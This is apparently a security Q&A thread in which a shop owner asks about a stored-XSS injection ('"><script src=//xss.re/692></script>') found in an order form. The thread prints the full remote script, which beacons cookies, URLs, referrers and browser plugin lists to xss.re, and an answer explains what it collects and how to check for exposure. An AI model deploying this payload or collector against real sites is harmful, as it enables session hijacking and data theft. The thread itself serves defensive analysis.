3

An e-commerce site I run recently received a suspicious transaction. The field for customer's name included a script tag, like so (customer's name changed to John Doe to protect anonymity):

John Doe"><script src=//xss.re/692></script>

The note field (where customers can write a note about their order) had the same tag without any other text:

"><script src=//xss.re/692></script>

The transaction appears otherwise normal. It's shipping to what appears to be a legitimate address in Ohio. The only other issue is that the somewhat legitimate-looking gmail address, doejohn123@gmail.com bounced. Since I can't contact the buyer and the general look is shady, I'm going to refund the payment, so no problem there.

What I'm curious about is, what is the purpose of the script tag? Googling "xss.re" doesn't seem to yield anything related, and the site itself just presents a login box for "IHONKER.ORG". The specific url in the script ("xss.re/692") loads the following script:

var x=new Image();
try
{
var myopener='';
myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
x.src='http://xss.re/XSS/?do=api&act=r&id=692&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape

(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);var activexa = new Array(
  "Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
  "Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
  "360Safe|360SafeLive.Update|classID",
  "Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
  "CMB Bank|CMBHtmlControl.Edit|classID",
  "Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",  
  "Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
  "JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
  "JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
  "KMPlayer|KMPlayer.TKMPDropTarget|classID",
  "KingSoft Word(�ʰ�)|KSEngine.Word|classID",
  "Windows live Messanger|Messenger.MsgrObject|classID",
  "Nero|NeroFileDialog.NeroFileDlg|classID",
  "Nokia Cellphone|NokiaCL.PhoneControl|classID",
  "PPlayer|PPlayer.XPPlayer|classID",
  "Tencent QQ|Qqedit.PasswordEditCtrl|classID",
  "QuickTime|QuickTime.QTElementBehavior|classID",
  "Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
  "Xunlei|XunLeiBHO.ThunderIEHelper|classID"
);

function iescan(){
      var mytmp;
      var plus;
      var bar;
      var x=new Image();
      for (i=0; i<activexa.length; i++){
          mytmp = activexa[i].split('|');  
          if ( checkobj(mytmp[1]) == true ){
                  plus+="|"+mytmp[0]+"<br>"; 

          }
      }
     bar = escape(plus);
    x.src='http://xss.re/XSS/?do=api&act=r&id=692&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(document.myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);

}


function checkobj(objName){ 
    try {
          var Obj = new ActiveXObject(objName);
          return true;
  } catch (e){
            return false;
  }
}
//-------------
function check_plus() {
    var plus = "";
        var bar = "";
    var b=new Image();
 var num_of_plugins = navigator.plugins.length;
for (var i=0; i < num_of_plugins; i++) {
         plus+= navigator.plugins[i].name+"&nbsp;|&nbsp;"+ navigator.plugins[i].filename +"<br>";
   }
    bar = escape(plus);
    b.src='http://xss.re/XSS/?do=api&act=r&id=692&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);

}

function MyPlusCheck() {

    if(!+[1,]){
iescan();
}else{
   check_plus();
}
}
setTimeout("MyPlusCheck()", 3000);

I'm having trouble understanding what the script does. So my questions are:

What does this script do?

As long as my site doesn't insert unfiltered user input into the DOM (it currently uses jQuery's .text(), which I believe is XSS safe), do I have anything to worry about from an attack like this?

Is there any plausible way that this tag could have been inserted by someone other than the person placing the order, ie. malware on a legitimate customer's system?

Community
  • 1
Robert
  • 607
  • 5
  • 13

1 Answers1

2

What does the script do?

It sends of some information to xss.re (by including it in a query string when loading images with JavaScript). If the attack had been successful, any person visiting the site where the injection took place would have had this information harvested:

  • The URL it was injected into (and some related things, like the "top" URL if it is in a frames, and the title).
  • Any cookies. This would include the session ID if it is not HTTP-only, and the CSRF token.
  • A list of ActiveX object the browser can create.
  • A list of plugins the browser is using.

Not sure, but I guess the last two is to check if there are any vulnerable ones that can be used for further exploits.

If you navigate to xss.re you get a login screan. I suspect it is a service that helps you mount XSS attacks and gather data from it. In the request the script sends back, there is an id parameter included in the query string. It is set to 692, same number as in the URL. I guess that is the user ID of the attacker.

Did it work?

You should make sure you are not vulnerable to this kind of attack. To do that you need to check everywhere this kind of data is echoed into the page - frontend, backend, etc.

You are correct that .text() is safe, since it relies on .textContent. However, the way the data gets into the JS is also important. If you just do something like element.text(<% echo $name; %>); you might have a problem. But if you get the name from e.g. an HTTP API call you are fine.

Anders
  • 64,406
  • 24
  • 178
  • 215